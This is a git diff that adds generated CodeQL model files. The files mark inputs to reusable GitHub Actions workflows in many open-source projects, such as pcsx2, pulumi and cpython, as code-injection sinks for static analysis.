diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml new file mode 100644 index 000000000000..7bc475348144 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml new file mode 100644 index 000000000000..060025b349b3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..408d0b8b5240 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..e24be2d0a21c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml new file mode 100644 index 000000000000..4e4140577982 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml new file mode 100644 index 000000000000..60c109da3e3f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml new file mode 100644 index 000000000000..1ac813e5e7fc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml new file mode 100644 index 000000000000..13878976e43b --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml new file mode 100644 index 000000000000..c66aff8690f7 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml new file mode 100644 index 000000000000..b99f14b3c529 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml new file mode 100644 index 000000000000..aa7b4a1c9b81 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml new file mode 100644 index 000000000000..2689698d33b2 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml new file mode 100644 index 000000000000..3c9e6718f915 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml new file mode 100644 index 000000000000..a91b3ed66a43 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml new file mode 100644 index 000000000000..fcfee85a8dad --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml new file mode 100644 index 000000000000..11d56b2b70b1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml new file mode 100644 index 000000000000..a824d844d866 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml new file mode 100644 index 000000000000..a7427768bbe3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml new file mode 100644 index 000000000000..505bb0cad074 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml new file mode 100644 index 000000000000..0899d449725e --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..89a0ccfdb85f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml new file mode 100644 index 000000000000..053e863a5130 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml new file mode 100644 index 000000000000..88d66d40826d --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml new file mode 100644 index 000000000000..534936eab1f3 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml new file mode 100644 index 000000000000..6d4259a45e52 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml new file mode 100644 index 000000000000..35d6bbd1b7bc --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..9dd893ca3b2a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml new file mode 100644 index 000000000000..10dfdc0c63ec --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml new file mode 100644 index 000000000000..fdc59aeb23da --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml new file mode 100644 index 000000000000..4b520ea39546 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml new file mode 100644 index 000000000000..f8630968c45f --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_pre", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "input.dockerhub_repository", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.timeout", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/docker.yml", "*", "input.docker_push_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml new file mode 100644 index 000000000000..4cf11f56fdf6 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] + - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml new file mode 100644 index 000000000000..44ad4f730764 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml new file mode 100644 index 000000000000..4d7af6469019 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] + - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml new file mode 100644 index 000000000000..0f525b146074 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] + - ["shaka-project/shaka-packager/.github/workflows/build.yaml", "*", "input.self_hosted", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..fc96f1497e01 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.browser_filter", "code-injection", "generated"] + - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.pr", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml new file mode 100644 index 000000000000..a57f0a860696 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml new file mode 100644 index 000000000000..ce86ebf49116 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] + - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml new file mode 100644 index 000000000000..05212ab32641 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml new file mode 100644 index 000000000000..6d40d72d019a --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml new file mode 100644 index 000000000000..f5ac697360b8 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] + - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml new file mode 100644 index 000000000000..95140465bfc4 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] + - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml new file mode 100644 index 000000000000..30cf3f54a2fa --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml new file mode 100644 index 000000000000..90937f50a3f1 --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] + - ["sqlfluff/sqlfluff/.github/workflows/ci-test-dbt.yml", "*", "input.dbt-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml new file mode 100644 index 000000000000..ec6a7385187c --- /dev/null +++ b/actions/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] + 